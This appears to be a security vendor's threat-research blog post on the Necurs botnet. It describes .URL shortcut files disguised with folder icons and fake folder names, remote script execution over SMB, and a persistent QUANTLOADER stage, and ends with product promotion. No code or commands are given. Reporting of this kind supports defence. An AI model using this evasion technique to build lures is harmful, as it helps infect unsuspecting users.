By Miguel Ang
Necurs, a botnet malware that’s been around since 2012, has been improved with the hopes of better defeating cybersecurity measures — it was seen to evolve its second layer of infection using a .URL file (with remote script downloaders detected by Trend Micro as MAL_CERBER-JS03D, MAL_NEMUCOD-JS21B, VBS_SCARAB.SMJS02, and MAL_SCARAB-VBS30.
The Necurs Transformation: The .URL File Layer
Necurs is indeed constantly evolving to find other effective measures of tricking victims while defeating countermeasures waged against it. And since it has a highly effective botnet component that may also be sold as a service, malicious actors will continue to find ways to circumvent detection and improve how they trick the weakest link in cybersecurity — the user.
As security vendors are wise to Necurs’s traditional infection chain (a script, a macro, or archives containing certain file formats), the malware has started using an internet shortcut or .URL file to bypass detection.
Figure 1. A diagram of a previous version of the Necurs malware.
Figure 2. A diagram of the evolved Necurs malware.
Internet shortcuts, or .URLs, take the form of clickable icons and are objects used to access internet sites or web documents faster. Internet shortcuts have contents that are in the INI file format, which allows the changing of icons. Necurs malware uses this to its advantage by changing the folder icon to trick the victim into thinking that it’s a different file type, as it is less suspicious than clicking on a script. The .URL will then access the remote resource that downloads another downloader. The second downloader remotely executes the payload.
Figure 3. A .URL file disguised as a .ZIP file of a voicemail message
Notice that aside from the icons disguised as folders, the filenames were also crafted to resemble typical folder names such as IMG-20180404-9AC4DD, SCN-20180404-268CC1, and PIC-20180404-ADEEEE shown in Figure 2, to name a few.
Figure 4. A screen capture of an internet shortcut’s extracted files
Furthermore, the actual attachment archive does not contain the script downloader Necurs uses to download its payload. The .URL file accesses the remote server, which then executes through the Server Message Block (SMB) protocol — a tactic that may be successful in evading certain spam filters.
Figure 5. A screen capture of a remote file being accessed through the SMB protocol
The malware doesn’t stop at disguising .URL files. The latest Necurs variant no longer has the actual script downloader in its attachment. It only contains the internet shortcut to the remote site that contains the script that is then executed remotely. This means that it does not “download” the actual script on the victim’s machine. This is the closest it gets to its previous malicious spam runs: Attaching a URL in the email and tricking a victim into clicking on the link to download a malicious file.
Figure 6. A look at Necurs’s attachment
Interestingly, Necurs does not infect computers using Russian as a language.
Further Evolution: Using QUANTLOADER
The use of QUANTLOADER may be twofold: First, it adds another download stage before it downloads the final payload, possibly to mix things up and evade behavioral detections. Secondly, QUANTLOADER is persistent in nature — it drops a copy of itself and creates an autorun registry so that it executes at startup.
Indicators of Compromise
Trend Micro solutions
To protect against Necurs and other continuously evolving spammed threats, businesses can take advantage of Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats by detecting malicious files, and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs. Deep Discovery is able to detect the remote script despite it not being downloaded in the physical endpoint.
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions. The spam mail used by this threat is detected on arrival by Trend Micro™ Email Reputation Services™, while our spam engine can detect Necurs’s technique: an archive containing internet shortcut.
Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
A list of all the hashes (SHA-256) is in this appendix.